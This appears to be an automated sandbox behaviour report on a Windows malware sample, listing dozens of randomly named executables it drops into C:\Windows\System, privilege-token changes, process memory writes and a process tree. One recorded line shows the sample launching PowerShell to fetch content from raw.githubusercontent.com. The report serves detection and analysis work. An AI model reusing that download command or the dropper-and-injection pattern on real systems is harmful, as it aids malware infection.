File created C:\Windows\System\WdWLFzL.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\ZSLrfxm.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\xmQeOVj.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\RlWkAPe.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\NyoIWyg.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\TIwHhdd.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\gpceLuN.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\YkieAhf.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\xUFgZLw.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\UIzkXyM.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\dkvoNOk.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\rqiiMTx.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\LQLsJmM.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\WBePZaW.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\RHtEDce.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\uTZxjfi.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\TFqBdED.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\jHXttfU.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\jJhPHRe.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\lWTFmfk.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\gTeoKhY.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4764 wrote to memory of 2780 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4764 wrote to memory of 2780 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4764 wrote to memory of 4544 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\WHaHHXd.exe
PID 4764 wrote to memory of 4544 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\WHaHHXd.exe
PID 4764 wrote to memory of 1872 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\jguTwpF.exe
PID 4764 wrote to memory of 1872 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\jguTwpF.exe
PID 4764 wrote to memory of 4844 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\xvFaDQS.exe
PID 4764 wrote to memory of 4844 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\xvFaDQS.exe
PID 4764 wrote to memory of 2352 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\XcdwAbu.exe
PID 4764 wrote to memory of 2352 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\XcdwAbu.exe
PID 4764 wrote to memory of 4524 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\JTGbFjk.exe
PID 4764 wrote to memory of 4524 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\JTGbFjk.exe
PID 4764 wrote to memory of 4280 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\dAMpoFG.exe
PID 4764 wrote to memory of 4280 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\dAMpoFG.exe
PID 4764 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\puCucRd.exe
PID 4764 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\puCucRd.exe
PID 4764 wrote to memory of 1776 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\uXmxyFI.exe
PID 4764 wrote to memory of 1776 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\uXmxyFI.exe
PID 4764 wrote to memory of 1848 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\KRNUtEW.exe
PID 4764 wrote to memory of 1848 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\KRNUtEW.exe
PID 4764 wrote to memory of 4952 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\nDAxWWo.exe
PID 4764 wrote to memory of 4952 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\nDAxWWo.exe
PID 4764 wrote to memory of 4608 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\NWszkAv.exe
PID 4764 wrote to memory of 4608 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\NWszkAv.exe
PID 4764 wrote to memory of 1924 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\eKhsLOM.exe
PID 4764 wrote to memory of 1924 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\eKhsLOM.exe
PID 4764 wrote to memory of 3140 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\osLNLvs.exe
PID 4764 wrote to memory of 3140 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\osLNLvs.exe
PID 4764 wrote to memory of 2748 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\ncYOZXQ.exe
PID 4764 wrote to memory of 2748 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\ncYOZXQ.exe
PID 4764 wrote to memory of 720 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\gMmOCZG.exe
PID 4764 wrote to memory of 720 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\gMmOCZG.exe
PID 4764 wrote to memory of 3568 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\BhvpPhw.exe
PID 4764 wrote to memory of 3568 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\BhvpPhw.exe
PID 4764 wrote to memory of 5088 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\edeHpFl.exe
PID 4764 wrote to memory of 5088 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\edeHpFl.exe
PID 4764 wrote to memory of 1844 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\ZUpXQhQ.exe
PID 4764 wrote to memory of 1844 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\ZUpXQhQ.exe
PID 4764 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\mrnahmd.exe
PID 4764 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\mrnahmd.exe
PID 4764 wrote to memory of 4112 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\RpkLJtX.exe
PID 4764 wrote to memory of 4112 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\RpkLJtX.exe
PID 4764 wrote to memory of 4776 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\BIEQtXh.exe
PID 4764 wrote to memory of 4776 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\BIEQtXh.exe
PID 4764 wrote to memory of 3172 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\TIyFgSd.exe
PID 4764 wrote to memory of 3172 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\TIyFgSd.exe
PID 4764 wrote to memory of 4584 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\DFYxUmB.exe
PID 4764 wrote to memory of 4584 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\DFYxUmB.exe
PID 4764 wrote to memory of 3548 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\vzCjAER.exe
PID 4764 wrote to memory of 3548 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\vzCjAER.exe
PID 4764 wrote to memory of 4884 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\svvYnGP.exe
PID 4764 wrote to memory of 4884 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\svvYnGP.exe
PID 4764 wrote to memory of 4480 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\dOXMIvW.exe
PID 4764 wrote to memory of 4480 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\dOXMIvW.exe
PID 4764 wrote to memory of 4032 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\axApzns.exe
PID 4764 wrote to memory of 4032 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\axApzns.exe
PID 4764 wrote to memory of 3144 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\xGGKQby.exe
PID 4764 wrote to memory of 3144 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\xGGKQby.exe
PID 4764 wrote to memory of 1376 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\zgqVVGe.exe
PID 4764 wrote to memory of 1376 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\zgqVVGe.exe
PID 4764 wrote to memory of 260 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\FNTbZsG.exe
PID 4764 wrote to memory of 260 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\FNTbZsG.exe
PID 4764 wrote to memory of 3280 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\aveJlwi.exe
PID 4764 wrote to memory of 3280 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\aveJlwi.exe

Processes

C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\WHaHHXd.exe

C:\Windows\System\WHaHHXd.exe

C:\Windows\System\jguTwpF.exe

C:\Windows\System\jguTwpF.exe

C:\Windows\System\xvFaDQS.exe

C:\Windows\System\xvFaDQS.exe

C:\Windows\System\XcdwAbu.exe

C:\Windows\System\XcdwAbu.exe

C:\Windows\System\JTGbFjk.exe

C:\Windows\System\JTGbFjk.exe

C:\Windows\System\dAMpoFG.exe

C:\Windows\System\dAMpoFG.exe

C:\Windows\System\puCucRd.exe

C:\Windows\System\puCucRd.exe

C:\Windows\System\uXmxyFI.exe

C:\Windows\System\uXmxyFI.exe

C:\Windows\System\KRNUtEW.exe

C:\Windows\System\KRNUtEW.exe

C:\Windows\System\nDAxWWo.exe

C:\Windows\System\nDAxWWo.exe

C:\Windows\System\NWszkAv.exe

C:\Windows\System\NWszkAv.exe

C:\Windows\System\eKhsLOM.exe

C:\Windows\System\eKhsLOM.exe

C:\Windows\System\osLNLvs.exe

C:\Windows\System\osLNLvs.exe

C:\Windows\System\ncYOZXQ.exe

C:\Windows\System\ncYOZXQ.exe

C:\Windows\System\gMmOCZG.exe

C:\Windows\System\gMmOCZG.exe

C:\Windows\System\BhvpPhw.exe

C:\Windows\System\BhvpPhw.exe

C:\Windows\System\edeHpFl.exe

C:\Windows\System\edeHpFl.exe

C:\Windows\System\ZUpXQhQ.exe

C:\Windows\System\ZUpXQhQ.exe

C:\Windows\System\mrnahmd.exe

C:\Windows\System\mrnahmd.exe

C:\Windows\System\RpkLJtX.exe

C:\Windows\System\RpkLJtX.exe

C:\Windows\System\BIEQtXh.exe

C:\Windows\System\BIEQtXh.exe

C:\Windows\System\TIyFgSd.exe

C:\Windows\System\TIyFgSd.exe

C:\Windows\System\DFYxUmB.exe

C:\Windows\System\DFYxUmB.exe

C:\Windows\System\vzCjAER.exe

C:\Windows\System\vzCjAER.exe

C:\Windows\System\svvYnGP.exe

C:\Windows\System\svvYnGP.exe

C:\Windows\System\dOXMIvW.exe

C:\Windows\System\dOXMIvW.exe

C:\Windows\System\axApzns.exe

C:\Windows\System\axApzns.exe

C:\Windows\System\xGGKQby.exe

C:\Windows\System\xGGKQby.exe

C:\Windows\System\zgqVVGe.exe

C:\Windows\System\zgqVVGe.exe

C:\Windows\System\FNTbZsG.exe

C:\Windows\System\FNTbZsG.exe

C:\Windows\System\aveJlwi.exe

C:\Windows\System\aveJlwi.exe

C:\Windows\System\RMmZSKY.exe

C:\Windows\System\RMmZSKY.exe

C:\Windows\System\NMKoTQF.exe

C:\Windows\System\NMKoTQF.exe

C:\Windows\System\UWXHwGX.exe

C:\Windows\System\UWXHwGX.exe

C:\Windows\System\iwIQyvt.exe

C:\Windows\System\iwIQyvt.exe

C:\Windows\System\ZagOynS.exe

C:\Windows\System\ZagOynS.exe

C:\Windows\System\rAdRtyU.exe

C:\Windows\System\rAdRtyU.exe

C:\Windows\System\MBxFIYS.exe

C:\Windows\System\MBxFIYS.exe

C:\Windows\System\FXqNuRj.exe

C:\Windows\System\FXqNuRj.exe

C:\Windows\System\ziaFKRt.exe

C:\Windows\System\ziaFKRt.exe

C:\Windows\System\UIzkXyM.exe

C:\Windows\System\UIzkXyM.exe

C:\Windows\System\qlCYtVx.exe

C:\Windows\System\qlCYtVx.exe

C:\Windows\System\flYwlbV.exe

C:\Windows\System\flYwlbV.exe

C:\Windows\System\WmtKFBV.exe

C:\Windows\System\WmtKFBV.exe

C:\Windows\System\bbdlExE.exe

C:\Windows\System\bbdlExE.exe

C:\Windows\System\sHgoZXv.exe

C:\Windows\System\sHgoZXv.exe

C:\Windows\System\lGFtFIT.exe

C:\Windows\System\lGFtFIT.exe

C:\Windows\System\PZymOzS.exe

C:\Windows\System\PZymOzS.exe

C:\Windows\System\vMyyBey.exe

C:\Windows\System\vMyyBey.exe

C:\Windows\System\WRaxOjH.exe

C:\Windows\System\WRaxOjH.exe

C:\Windows\System\IAwLozx.exe

C:\Windows\System\IAwLozx.exe

C:\Windows\System\Gfxkwph.exe

C:\Windows\System\Gfxkwph.exe

C:\Windows\System\YwRwYqw.exe

C:\Windows\System\YwRwYqw.exe

C:\Windows\System\oYkDlZm.exe

C:\Windows\System\oYkDlZm.exe

C:\Windows\System\fVreReu.exe

C:\Windows\System\fVreReu.exe

C:\Windows\System\TCrtvyz.exe

C:\Windows\System\TCrtvyz.exe

C:\Windows\System\trutmOW.exe

C:\Windows\System\trutmOW.exe

C:\Windows\System\cbrHepd.exe

C:\Windows\System\cbrHepd.exe

C:\Windows\System\cbGHKyA.exe

C:\Windows\System\cbGHKyA.exe

C:\Windows\System\TCrFfBR.exe

C:\Windows\System\TCrFfBR.exe

C:\Windows\System\pbIPhgI.exe

C:\Windows\System\pbIPhgI.exe

C:\Windows\System\hSSUkLk.exe

C:\Windows\System\hSSUkLk.exe

C:\Windows\System\VDOXgTE.exe

C:\Windows\System\VDOXgTE.exe

C:\Windows\System\ZoPDFpk.exe

C:\Windows\System\ZoPDFpk.exe

C:\Windows\System\ZOwfYrP.exe

C:\Windows\System\ZOwfYrP.exe

C:\Windows\System\yYeTVCL.exe

C:\Windows\System\yYeTVCL.exe

C:\Windows\System\dQFrjZP.exe

C:\Windows\System\dQFrjZP.exe

C:\Windows\System\ITRmpDx.exe

C:\Windows\System\ITRmpDx.exe

C:\Windows\System\tspTmbL.exe

C:\Windows\System\tspTmbL.exe

C:\Windows\System\EcQOGsh.exe

C:\Windows\System\EcQOGsh.exe

C:\Windows\System\wFSQBqO.exe

C:\Windows\System\wFSQBqO.exe

C:\Windows\System\vwmMmzX.exe

C:\Windows\System\vwmMmzX.exe

C:\Windows\System\RVPUgfA.exe

C:\Windows\System\RVPUgfA.exe

C:\Windows\System\jcIcjvm.exe

C:\Windows\System\jcIcjvm.exe

C:\Windows\System\oFWWqEC.exe

C:\Windows\System\oFWWqEC.exe

C:\Windows\System\tCSeDQM.exe

C:\Windows\System\tCSeDQM.exe

C:\Windows\System\SmQaXiE.exe

C:\Windows\System\SmQaXiE.exe

C:\Windows\System\uZvtbbW.exe

C:\Windows\System\uZvtbbW.exe

C:\Windows\System\JPRpHWg.exe

C:\Windows\System\JPRpHWg.exe

C:\Windows\System\fKgMzFX.exe

C:\Windows\System\fKgMzFX.exe

C:\Windows\System\CnaKkrG.exe

C:\Windows\System\CnaKkrG.exe

C:\Windows\System\KpMlLiy.exe

C:\Windows\System\KpMlLiy.exe

C:\Windows\System\mQNHOpv.exe

C:\Windows\System\mQNHOpv.exe

C:\Windows\System\SZpTDED.exe

C:\Windows\System\SZpTDED.exe

C:\Windows\System\yJCWeOH.exe

C:\Windows\System\yJCWeOH.exe

C:\Windows\System\IUdlAOD.exe

C:\Windows\System\IUdlAOD.exe

C:\Windows\System\FFdnNZe.exe

C:\Windows\System\FFdnNZe.exe

C:\Windows\System\BiGsjKc.exe

C:\Windows\System\BiGsjKc.exe

C:\Windows\System\eLdchDG.exe

C:\Windows\System\eLdchDG.exe

C:\Windows\System\YTUlJFZ.exe

C:\Windows\System\YTUlJFZ.exe

C:\Windows\System\oKDjocM.exe

C:\Windows\System\oKDjocM.exe

C:\Windows\System\mhcsYzL.exe

C:\Windows\System\mhcsYzL.exe

C:\Windows\System\XMCVIci.exe

C:\Windows\System\XMCVIci.exe

C:\Windows\System\JuOPjKs.exe

C:\Windows\System\JuOPjKs.exe

C:\Windows\System\Bwkccjo.exe

C:\Windows\System\Bwkccjo.exe

C:\Windows\System\wnIlYtv.exe

C:\Windows\System\wnIlYtv.exe

C:\Windows\System\OTbNPuD.exe

C:\Windows\System\OTbNPuD.exe

C:\Windows\System\NajAApK.exe

C:\Windows\System\NajAApK.exe

C:\Windows\System\luYKZOr.exe

C:\Windows\System\luYKZOr.exe

C:\Windows\System\waktOMB.exe

C:\Windows\System\waktOMB.exe

C:\Windows\System\boEZjKL.exe

C:\Windows\System\boEZjKL.exe

C:\Windows\System\ligiIgJ.exe

C:\Windows\System\ligiIgJ.exe

C:\Windows\System\gVEFMhy.exe

C:\Windows\System\gVEFMhy.exe

C:\Windows\System\udzGGxe.exe

C:\Windows\System\udzGGxe.exe

C:\Windows\System\WqWGLEw.exe

C:\Windows\System\WqWGLEw.exe

C:\Windows\System\DKhqTWj.exe

C:\Windows\System\DKhqTWj.exe

C:\Windows\System\KfNjMbc.exe

C:\Windows\System\KfNjMbc.exe

C:\Windows\System\IIpKSqg.exe

C:\Windows\System\IIpKSqg.exe

C:\Windows\System\nWKhgJH.exe

C:\Windows\System\nWKhgJH.exe

C:\Windows\System\xeUKEyw.exe

C:\Windows\System\xeUKEyw.exe

C:\Windows\System\HwEZtaG.exe

C:\Windows\System\HwEZtaG.exe

C:\Windows\System\tiFwDGZ.exe

C:\Windows\System\tiFwDGZ.exe

C:\Windows\System\paaGvNv.exe

C:\Windows\System\paaGvNv.exe

C:\Windows\System\ZjqFVPm.exe

C:\Windows\System\ZjqFVPm.exe

C:\Windows\System\PeGJAoN.exe

C:\Windows\System\PeGJAoN.exe

C:\Windows\System\Rfydwid.exe

C:\Windows\System\Rfydwid.exe

C:\Windows\System\NsiRLFl.exe

C:\Windows\System\NsiRLFl.exe

C:\Windows\System\Dgukjac.exe

C:\Windows\System\Dgukjac.exe

C:\Windows\System\ADxHeNq.exe

C:\Windows\System\ADxHeNq.exe

C:\Windows\System\oHbrNes.exe

C:\Windows\System\oHbrNes.exe

C:\Windows\System\aBNwEHL.exe

C:\Windows\System\aBNwEHL.exe

C:\Windows\System\xqGEMnM.exe

C:\Windows\System\xqGEMnM.exe

C:\Windows\System\fbPJxDX.exe

C:\Windows\System\fbPJxDX.exe

C:\Windows\System\zkPRXIg.exe

C:\Windows\System\zkPRXIg.exe

C:\Windows\System\QnZZgwC.exe

C:\Windows\System\QnZZgwC.exe

C:\Windows\System\dmSfOhp.exe

C:\Windows\System\dmSfOhp.exe

C:\Windows\System\hUIONnT.exe

C:\Windows\System\hUIONnT.exe

C:\Windows\System\gREzcjX.exe

C:\Windows\System\gREzcjX.exe

C:\Windows\System\vmpgudK.exe

C:\Windows\System\vmpgudK.exe

C:\Windows\System\yhPisjk.exe

C:\Windows\System\yhPisjk.exe

C:\Windows\System\JzKryOD.exe

C:\Windows\System\JzKryOD.exe

C:\Windows\System\ZCNODFg.exe

C:\Windows\System\ZCNODFg.exe

C:\Windows\System\VnnHpPi.exe

C:\Windows\System\VnnHpPi.exe

C:\Windows\System\uhzpoIk.exe

C:\Windows\System\uhzpoIk.exe

C:\Windows\System\uVfrXgY.exe

C:\Windows\System\uVfrXgY.exe

C:\Windows\System\YwMydZe.exe

C:\Windows\System\YwMydZe.exe

C:\Windows\System\WuslsEc.exe

C:\Windows\System\WuslsEc.exe

C:\Windows\System\YsKGClT.exe

C:\Windows\System\YsKGClT.exe

C:\Windows\System\UuVUOEo.exe

C:\Windows\System\UuVUOEo.exe

C:\Windows\System\OuwglsG.exe

C:\Windows\System\OuwglsG.exe

C:\Windows\System\NuDbPgE.exe

C:\Windows\System\NuDbPgE.exe

C:\Windows\System\GqViCNt.exe

C:\Windows\System\GqViCNt.exe

C:\Windows\System\MCjdxFF.exe

C:\Windows\System\MCjdxFF.exe

C:\Windows\System\dCJGukz.exe

C:\Windows\System\dCJGukz.exe

C:\Windows\System\WFCvcXB.exe

C:\Windows\System\WFCvcXB.exe

C:\Windows\System\sEhHdcz.exe

C:\Windows\System\sEhHdcz.exe

C:\Windows\System\juoGtYl.exe

C:\Windows\System\juoGtYl.exe

C:\Windows\System\yWaUduI.exe

C:\Windows\System\yWaUduI.exe

C:\Windows\System\TliCHlI.exe

C:\Windows\System\TliCHlI.exe

C:\Windows\System\oYXjhBa.exe

C:\Windows\System\oYXjhBa.exe

C:\Windows\System\xIteOaB.exe

C:\Windows\System\xIteOaB.exe

C:\Windows\System\FknINkr.exe

C:\Windows\System\FknINkr.exe

C:\Windows\System\qYGVQGF.exe

C:\Windows\System\qYGVQGF.exe

C:\Windows\System\dteeonE.exe

C:\Windows\System\dteeonE.exe

C:\Windows\System\DCmYEdT.exe

C:\Windows\System\DCmYEdT.exe

C:\Windows\System\uNBXIyJ.exe

C:\Windows\System\uNBXIyJ.exe

C:\Windows\System\cdYHGWi.exe

C:\Windows\System\cdYHGWi.exe

C:\Windows\System\lbsUVbI.exe

C:\Windows\System\lbsUVbI.exe

C:\Windows\System\muencUI.exe

C:\Windows\System\muencUI.exe

C:\Windows\System\EfFYMXQ.exe

C:\Windows\System\EfFYMXQ.exe

C:\Windows\System\FeEHbVr.exe

C:\Windows\System\FeEHbVr.exe

C:\Windows\System\fJRBShF.exe

C:\Windows\System\fJRBShF.exe

C:\Windows\System\HKXcDhl.exe

C:\Windows\System\HKXcDhl.exe

C:\Windows\System\WhgSqvC.exe

C:\Windows\System\WhgSqvC.exe

C:\Windows\System\AqERHSC.exe

C:\Windows\System\AqERHSC.exe

C:\Windows\System\QLTppJa.exe

C:\Windows\System\QLTppJa.exe

C:\Windows\System\xenCOLn.exe

C:\Windows\System\xenCOLn.exe

C:\Windows\System\aytRoma.exe

C:\Windows\System\aytRoma.exe

C:\Windows\System\zERarUD.exe

C:\Windows\System\zERarUD.exe

C:\Windows\System\odyIQPI.exe

C:\Windows\System\odyIQPI.exe

C:\Windows\System\ijDxtXR.exe

C:\Windows\System\ijDxtXR.exe

C:\Windows\System\UCUIztd.exe

C:\Windows\System\UCUIztd.exe

C:\Windows\System\UHmPbpM.exe

C:\Windows\System\UHmPbpM.exe

C:\Windows\System\lJIxTTG.exe

C:\Windows\System\lJIxTTG.exe

C:\Windows\System\QrPqVDA.exe

C:\Windows\System\QrPqVDA.exe

C:\Windows\System\wpNGTWk.exe

C:\Windows\System\wpNGTWk.exe

C:\Windows\System\ihqYJGL.exe

